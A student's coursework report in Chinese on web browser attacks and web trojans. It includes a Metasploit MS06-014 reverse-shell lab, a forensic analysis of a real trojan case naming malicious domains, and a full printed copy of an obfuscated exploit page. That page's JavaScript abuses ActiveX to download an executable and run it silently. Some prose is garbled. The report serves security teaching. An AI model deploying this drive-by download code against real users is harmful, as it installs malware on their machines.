20211917 2021-2022-2 《网络攻防实践》第十一周作业
一、知识点总结
-
1.Web浏览器的安全威胁
-
1.1.现代Web浏览器的基本结构与机理
现代网络浏览器是指那些遵从“现代标准”,并且为因特网用户所接受的网络浏览器,现在的网络浏览器需要能了解和支持 HTML、 XHTML、 CSS、 ECMAScript和W3C DOM等一系列标准,并且在基础架构和各种功能特征上都有了很大的提高。支持不同应用层协议的 Stream流的接收和分析,并保持 DOM对象模型的结构,建立 JavaScript、 Flash ActionScript等客户端脚本语言,并支持 CSS的网页设计,最后在浏览器终端上呈现出不同的流媒体对象、应用程序和客户端脚本执行效果。
现代的网络浏览器软件,在内核引擎中,除了满足不同标准的基本功能和特点以外,还广泛地使用了多种扩充机制,使得第三方能够开发出更多的插件。下面的表格展示了当前世界五大主流网络浏览器应用的核心代码和可扩充机制,微软 IE浏览器是以 Trident核心引擎(又名 MSHTML)为基础的,它在1996年首次浏览器大战期间就引入了 Activex技术,以支持第三方开发的扩展插件,至今仍在使用。Mozilla火狐的核心是 Gecko,它支持 XUL平台的扩展插件开发。谷歌 Chrome和 Apple Safari都是以开放源码 Webkit核心引擎为基础的, Opera是以 Presto为核心的,这三个版本都是在2010年才推出的。
除了扩展的插件,现代的网络浏览器也支持构建丰富的网络应用,包括不同的客户端脚本执行环境,独立的沙箱操作环境,以及虚拟机,这些都是基于桌面应用的特点(RIA: Rich Internet Application),目前 Adobe Flash/Flex, Java,微软 Sliverlight,这三个最常见的 RIA平台环境技术,可以帮助 Web应用程序在用户交互、客户端执行和显示方面更加友好。
-
1.2.Web浏览的安全问题与威胁
网络浏览器的三大安全难题是:复杂性、可扩展性、连通性;
网络浏览安全威胁地点:
网络协议的安全性问题:由于网络是将 Web应用程序和用户浏览环境之间的一种中介,所以 Web浏览用户也会受到网络传输协议的安全攻击和威胁。
网络浏览系统的安全性问题:由于网络用户在浏览网络时所使用的浏览器软件、插件以及相关的软件均是基于桌面操作系统的,因此,桌面操作系统的安全性问题导致了网络浏览环境受到了严重的侵害。
随着网络防火墙、网络入侵防御等安全设施的出现,使得传统的入侵入侵越来越难以进行,因此,近年来,针对网络浏览器和插件的客户端入侵成为了一种新的趋势。
对因特网使用者造成的「社会工程」攻击:「网路攻击」是指网路使用者的「人性」、「心理」等软肋。 -
2.Web浏览端的渗透攻击威胁---网页木马
-
2.1.网页木马安全威胁的产生背景
网页木马起源于一个历史时期:由一个由恶意网站编写而成的网络病毒。
网络木马的发展和普及——黑客的秘密经济链条
Web Web浏览器的技术依据—— Web浏览器的安全性问题 -
2.2.网页木马的机理分析
2.2.1.网页木马的定义特性
本文通过对网络木马产生的背景及技术进行了分析,认为木马是利用了当前网络浏览器中的客户端脚本,实现了对 Web浏览器的入侵,并在此基础上获取了用户端的代码执行权限,将恶意程序植入到用户端。因此,从本质上来说,网页木马是一种针对 Web浏览程序的入侵代码,它是一种基于传统入侵程序的入侵代码,它是一种针对服务器端软件的入侵攻击。
根据以上的研究结果,本文认为,网络木马是一种针对网络浏览端软件进行用户入侵的恶意代码,其主要表现为 JavaScript、 VBScript等 Web脚本,或者是恶意构建的 Flash、 PDF等 Web文档,利用网络浏览软件中的安全漏洞,获取用户的控制权限,从而将恶意程序植入到用户电脑中。
2.2.2.对网页木马机理的全方位分析与理解
由于网页木马采取了客户端入侵的方式,因此必然要求网络浏览端软某访问构建的恶意网页内容,从而触发入侵。与传统的入侵入侵相比,网站木马是一种被动的行为,它必须采用一定的技术手段吸引用户进入,另外,当木马入侵入侵时,它就会对客户电脑进行远程代码的执行。为实现对主机的进一步控制和对敏感信息的窃取,通常需要在网络中安装一些诸如盗号、木马之类的恶意软件。所以,在网络上进行木马病毒的入侵,与传统的入侵方法不同,它包含了更多的复杂的多步攻击,并且需要大量的恶意代码和网络资源。
网页木马特性:
不同的客户机渗入地点和技术类型
分布式复杂微观连接
易变的混沌和对抗性分析
2.2.3.网页挂马机制
内置 HTML标记:一种是利用内置的 HTML标记,比如 iframe, frame等,在网站的主页上嵌入一个木马的链接;
恶意 Script脚本:在外部使用 script脚本标记来包括一个网页木马;
嵌入的物件连结:第三种是网页挂马策略,利用图片、 Flash等嵌入物件中的特殊方式,可以生成某些含有木马的图片或 Flash,并将其上传至某些允许使用者上传图片及 Flash的网站,从而导致某些网页因挂马而受到威胁。
ARP欺诈挂马: arp漆面挂马并不一定要攻占一个目标站点,在相同的以太网区段,攻击者可以利用 ARP欺诈手段进行中间人攻击,夺取目标站点进出的所有网络流量;该软件可以将恶意的脚本插入到目标网站的 HTML回传中,使得它可以作为一个挂马站,把网络访问流量连接到木马。
- 2.3.网页木马防范措施
另外,安装和实时更新一款高质量的防病毒软件也是应对木马入侵的一个重要步骤,并且要培养安全上网浏览的习惯,利用 Google安全浏览、 Site Advisor等站点安全评估工具的帮助避免访问那些可能遭遇挂马或者安全性不高的网站,可以通过 Google安全浏览、 Site Advisor等站点安全评估工具的帮助避免访问那些可能遭遇挂马或者安全性不高的网站,可以有效地降低被网页木马入侵攻击的概率:最后,在当前网页木马主要危害 Windows和 IE浏览器的用户时,可以安装 Mac/Linux,利用 Chrome、 Safari、 Opera等冷门浏览器进行浏览,成为网络网民中的一个特立独行的少数人,可以有效地防止木马的侵袭。。
二、实践内容
- 1.动手实践——Web浏览器渗透攻击实验
实验步骤:
1.首先,开始 Metasploit,接着查找MS06-014的 bug,并使用 use指令来选中这个 bug
2.然后将本地 IP设定为攻击 IP,并在192.168.2.36上执行 set Lhost192.168.2.36,将该恶意服务器的地址设定成本机
3.最后设置负载,在此选择使用常见的,执行 set页面窗口/meterpreter/reverse_tcp
4.发起攻击,并产生一个恶意链接,并创建一个恶意的服务器。
5.把这个恶意链接拷贝到目标 IE的网址列,然后你会看到一个反馈消息在攻击机上。
6.检视对话清单,找到目标与攻击机器之间的联系,并进行sessions-i1,选中此会话
7.成功地实现了对目标的遥控,可以对目标进行指令的输入
- 2.取证分析实践:剖析一个实际的网页木马攻击场景
1.因为题目所附资料中的地址已经失效,所以根本不可能还原出真正的木马,所以我们只能从资料上找到相关的资料,先用笔记本打开start.ht m,再进行分析,结果显示,在这个页面上,有一个内联的框架,指向的是一个页面new09.ht m,这个页面的高度是0,很难被察觉。
2.指向new09.ht m的网页是用相对路径来表示new09.ht m和start.ht m在同一个目录下,所以,我修改 url,获得new09.ht m的页面信息,经过分析,它通过内联框架指向了http://aa.18dd.net/aa/kl.htm,还使用 script指向了另一个页面http://js.users.51.la/1299644.js
3.他按照实验指南上的提示,找到了两个页面上的链接,然后进行了分析,结果没有任何有用的东西,他点开了第二个页面,发现了大量的信息。我把所有的页面信息都拷贝到 FreShow的内容栏里(js加解密),点击“解码”键,下面的框里就出现了一段代码,很容易就能判断出是用了64位密码;具有" script"的口令
4.将一份文件拷贝到 FreShow的工具栏(我不知道是从哪里来的,也不是在实验指南上写的),经过翻译,得到了以下的信息:在对微软数据库访问对象、暴风视频、 PPStream、百度搜索等方面进行分析后,找到了“Adodb. Stream”,“MPS. StormPlayer”,以及“BaiduBar. Tool”;最后是一种恶意软件的下载。
5.然后,打开一份资料准备好的1. js,再把它拷贝到 FreShow的内容方块,再把它译成代码,并按下面的图表产生一个可以执行的 exe文件。
6.下面用相同的方式对 b. js进行解析,却发现 FreShow完全不能破译,尝试了试验指南中的翻译站点,也不能进入;只有按照指令破译的内容,才能进行解析;在被解码的内容中,有一个 shellcode,这很有可能是用来攻击的。
7.因为要执行的 exe文件在参考资料中已提供,因此,我们可以直接打开解析,先用 peid来打开 bf. exe,看看有没有外壳,而且这个软件是 Delphi开发的。
8.接着,利用W32Dasm工具进行反编译,并检查字符串的信息。并产生 bat批次,接着进行 delete,删除部分文件,并从该恶意站点下载20个恶意软件到受害人的主机;Shell\ Auto\ command=表示,这个软件将在受害人的主目录中自动地执行 shell指令;最后,还找到了"瑞星网络安全助理- IE防泄漏墙","许可","许可使用",这是一个可以阻止反病毒程序对其进行检查的设置。
9.这20种恶意软件在参考资料中都有,你可以试着解析一个4. exe,先用 peid来开启,结果发现这个软件是有壳的,接着是超级巡逻艇的外壳;然后,他又用 PID打开了外壳,发现了一个“Morphine1.2-1.3- rootkit”的外壳,按照实验指南上的说法,这是一个假壳,不用担心。最后,我用C32Asm成功的打开了4. exe,查看了一下" bat"这个关键字,貌似是在进行批量操作,但具体是什么,我也看不懂,因为里面有大量的代码。
10.因为不能解析恶意软件的内容,所以只能先试着运行,然后下载360卫士,把它拉进安全的沙盒中。随后,我们在监控中发现了许多木马和恶意软件,这些恶意软件在 Windows系统的文件目录中产生了可执行的软件和 DLL DLL文件。
- 实践回答:
2.代码加密采用base64,“script”,可以直接使用 FreShow的工具进行解密
3.MS06-014网马、暴风视频网马、 PPStream网马、百度搜索马
4.在解密之后,发现可执行文件是从 js中下载的,它是 bb/014. exe,它会从down.18dd.net上下载20个恶意程序
5.将恶意程序运行4. exe后,从 windows系统中产生的一个病毒木马取出,先用 peid打开,发现没有外壳,再用拆装工具打开,查看字符串的信息,找到一个关键信息 send;我猜测,这是把受害人的主机上的一些信息传送到了目的地,而在这个地址的下方,又出现了 url的信息,因为字符的显示问题,所以无法解析 url指向哪里。
- 3.攻防对抗实践:Web浏览器渗透攻防对抗
1.首先,利用ms06-014的漏洞,通过 Metasploit中的链接,攻击者可以获得对话,并对目标进行控制;这个程序是怎样完成的?我将靶机访问的页面保存了起来,打开之后,我发现这个页面上有很多的空格和空格,这是为了防止病毒入侵。
2.进过去除无效回车符和空格后,我们得到了完整的网页信息,然后可以看到,该网页中的JavaScript使用了createObject,GetObject,Wscript.shell,
Adobe.stream等指令
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=GB2312">
<title></title>
<script language="javascript">
function
CtzoijGBqVnRPoW(o , n)
{
var r =null;
try
{
eval("r=o"+".C"+"re"+"ate"+"Ob" +"je"+"ct(n)"
)
}catch(e){}
if(!r)
{
try
{ eval("r=o"+".Cr"+"ea" +"teO"+"bj"+"ect(n,'')")
}catch(e){}
}
if(!r)
{
try{
eval("r=o" +".Cr"+"ea"+ "teO"+"bj"+"ect(n,'','')" )
}
catch(e){}
}
if(!r)
{
try{
eval("r=o" +".Ge"+"tOb"+"je"+"ct('',n)")
}catch(e){}
}
if(!r)
{
try{
eval("r=o" +".Ge"+"tOb"+"je"+"ct('',n)")
}catch(e){}
}
if(!r)
{
try{
eval("r=o" +".Ge"+"tOb"+"ject(n)" )
}catch(e){}
}
return(r);
}
function
CkziPkDEVvzcUK(a)
{
var s=CtzoijGBqVnRPoW(a,"W" +"Sc"+"ri" +"pt"+".S"+"he"+"ll");
var o=CtzoijGBqVnRPoW(a,"A" +"DO"+"D"+"B.S"+"tr"+"eam");
var e=s.Environment("P"+"ro"+"ce" +"ss" );
var url =document.location +'/p'+'ay'+'lo'+'ad';
var xml = null;
var bin =e.Item("T" + "E"+"M" + "P")+"\\fHEzfuTlSyw"+ ".e"+"xe";
var dat;
try
{
xml=new XMLHttpRequest();
}
catch(e)
{
try
{
xml=new ActiveXObject("Microsoft.XMLHTTP");
}
catch(e)
{
xml = new ActiveXObject("MSXML2.ServerXMLHTTP");
}
}
if(!xml)
{
return(0);
}
xml.open("GET", url,false);
xml.send(null);
dat =xml.responseBody;
o.Type= 1 ;
o.Mode= 3 ;
o.Open();
o.Write(dat);
o.SaveToFile(bin,2);
s.Run(bin,0);
}
function
SmerREcbuXkUCwZbRyMEEfsRDDQRTeK()
{
var i=0;
var t=new Array( '{'+'B'+'D'+'9'+'6'+'C'+'5'+'5'+'6'+'-'+'6'+'5'+'A'+'3'+'-'+'1'+'1'+'D'+'0'+'-'+'9'+'8'+'3'+'A'+'-'+'0'+'0'+'C'+'0'+'4'+'F'+'C'+'2'+'9'+'E'+'3'+'6'+'}','{'+'B'+'D'+'9'+'6'+'C'+'5'+'5'+'6'+'-'+'6'+'5'+'A'+'3'+'-'+'1'+'1'+'D'+'0'+'-'+'9'+'8'+'3'+'A'+'-'+'0'+'0'+'C'+'0'+'4'+'F'+'C'+'2'+'9'+'E'+'3'+'0'+'}','{'+'7'+'F'+'5'+'B'+'7'+'F'+'6'+'3'+'-'+'F'+'0'+'6'+'F'+'-'+'4'+'3'+'3'+'1'+'-'+'8'+'A'+'2'+'6'+'-'+'3'+'3'+'9'+'E'+'0'+'3'+'C'+'0'+'A'+'E'+'3'+'D'+'}','{'+'6'+'e'+'3'+'2'+'0'+'7'+'0'+'a'+'-'+'7'+'6'+'6'+'d'+'-'+'4'+'e'+'e'+'6'+'-'+'8'+'7'+'9'+'c'+'-'+'d'+'c'+'1'+'f'+'a'+'9'+'1'+'d'+'2'+'f'+'c'+'3'+'}','{'+'6'+'4'+'1'+'4'+'5'+'1'+'2'+'B'+'-'+'B'+'9'+'7'+'8'+'-'+'4'+'5'+'1'+'D'+'-'+'A'+'0'+'D'+'8'+'-'+'F'+'C'+'F'+'D'+'F'+'3'+'3'+'E'+'8'+'3'+'3'+'C'+'}','{'+'0'<h+'6'+'7'+'2'+'3'+'E'+'0'+'9'+'-'+'F'+'4'+'C'+'2'+'-'+'4'+'3'+'c'+'8'+'-'+'8'+'3'+'5'+'8'+'-'+'0'+'9'+'F'+'C'+'D'+'1'+'D'+'B'+'0'+'7'+'6'+'6'+'}','{'+'6'+'3'+'9'+'F'+'7'+'2'+'5'+'F'+'-'+'1'+'B'+'2'+'D'+'-'+'4'+'8'+'3'+'1'+'-'+'A'+'9'+'F'+'D'+'-'+'8'+'7'+'4'+'8'+'4'+'7'+'6'+'8'+'2'+'0'+'1'+'0'+'}','{'+'B'+'A'+'0'+'1'+'8'+'5'+'9'+'9'+'-'+'1'+'D'+'B'+'3'+'-'+'4'+'4'+'f'+'9'+'-'+'8'+'3'+'B'+'4'+'-'+'4'+'6'+'1'+'4'+'5'+'4'+'C'+'8'+'4'+'B'+'F'+'8'+'}','{'+'D'+'0'+'C'+'0'+'7'+'D'+'5'+'6'+'-'+'7'+'C'+'6'+'9'+'-'+'4'+'3'+'F'+'1'+'-'+'B'+'4'+'A'+'0'+'-'+'2'+'5'+'F'+'5'+'A'+'1'+'1'+'F'+'A'+'B'+'1'+'9'+'}','{'+'E'+'8'+'C'+'C'+'C'+'D'+'D'+'F'+'-'+'C'+'A'+'2'+'8'+'-'+'4'+'9'+'6'+'b'+'-'+'B'+'0'+'5'+'0'+'-'+'6'+'C'+'0'+'7'+'C'+'9'+'6'+'2'+'4'+'7'+'6'+'B'+'}','{'+'A'+'B'+'9'+'B'+'C'+'E'+'D'+'D'+'-'+'E'+'C'+'7'+'E'+'-'+'4'+'7'+'E'+'1'+'-'+'9'+'3'+'2'+'2'+'-'+'D'+'4'+'A'+'2'+'1'+'0'+'6'+'1'+'7'+'1'+'1'+'6'+'}','{'+'0'+'0'+'0'+'6'+'F'+'0'+'3'+'3'+'-'+'0'+'0'+'0'+'0'+'-'+'0'+'0'+'0'+'0'+'-'+'C'+'0'+'0'+'0'+'-'+'0'+'0'+'0'+'0'+'0'+'0'+'0'+'0'+'0'+'0'+'4'+'6'+'}','{'+'0'+'0'+'0'+'6'+'F'+'0'+'3'+'A'+'-'+'0'+'0'+'0'+'0'+'-'+'0'+'0'+'0'+'0'+'-'+'C'+'0'+'0'+'0'+'-'+'0'+'0'+'0'+'0'+'0'+'0'+'0'+'0'+'0'+'0'+'4'+'6'+'}' ,null);
while(t[i])
{
var a=null;
if(t[i].substring(0,1)=='{')
{
a=document.createElement("object");
a.setAttribute("cl"+ "as"+"sid","cl"+"s"+"id" +":"+ t[i].substring(1,t[i].length-1 ));
}
else
{
try {
a=new ActiveXObject(t[i]);
}
catch(e){}
}
if (a)
{
try {
var b=CtzoijGBqVnRPoW(a ,"W"+"Sc"+ "ri"+"pt"+ ".S" +"he" + "ll" );
if(b)
{
CkziPkDEVvzcUK(a);
return(0);
}
}
catch(e){}
}
i++;
}
}
</script>
</head>
<body onload="SmerREcbuXkUCwZbRyMEEfsRDDQRTeK()">
kHNbbdThGhM
<div style="position: absolute; display: none; z-index: 9999;" id="livemargins_control">
<img src="0AYHSwSEujCe_files/monitor-background-horizontal.png" style="position: absolute; left: -77px; top: -5px;" width="77" height="5">
<img src="0AYHSwSEujCe_files/monitor-background-vertical.png" style="position: absolute; left: 0pt; top: -5px;">
<img id="monitor-play-button" src="0AYHSwSEujCe_files/monitor-play-button.png" onmouseover="this.style.opacity=1" onmouseout="this.style.opacity=0.5" style="position: absolute; left: 1px; top: 0pt; opacity: 0.5; cursor: pointer;">
</div>
</body>
</html>
下面的图片显示,文档. location是用 js来装入页面的,而下一行是 fHEzfuTlSyw. exe;我猜测,这份可执行程序可能是由攻击电脑作为服务器,从网页上下载到目标计算机,并且每一次装入恶意网页所产生的可执行程序名称不同;他打开了靶机的任务管理系统,找到了一个可以执行的文件,这是一个恶意软件,可以让黑客获得目标的控制权。
3.接着又对整个页面进行了详细的剖析,在浏览的过程中,《body》中会出现一些随机的文字,这也不算稀奇,一开始的时候,我还不知道怎么把这两种攻击融合在一起,之前的挂马分析,让我得到了一些启发;我们可以通过 metasploit来利用其他浏览器的漏洞来创建一个新的链接,在我们的分析中,我们会把《frame》的内嵌结构嵌入到新的恶意链接中,然后把两个恶意页面放在 Apache的网站上,然后用另一个漏洞极光。在内联框中放置产生的恶意链接
4.再将这个恶意网站放入网站,再开启 metasploit监控,依然可以监听,而且还有多个对话
5.成功获取了靶机的控制权限。
四、遇到的问题
1.参考文档始终没有办法把工具安装到Linux上
2.Linux总是主机本地地址发生改变,使得反弹木马的主机IP失效了,使用静态的主机IP没有办法联网。
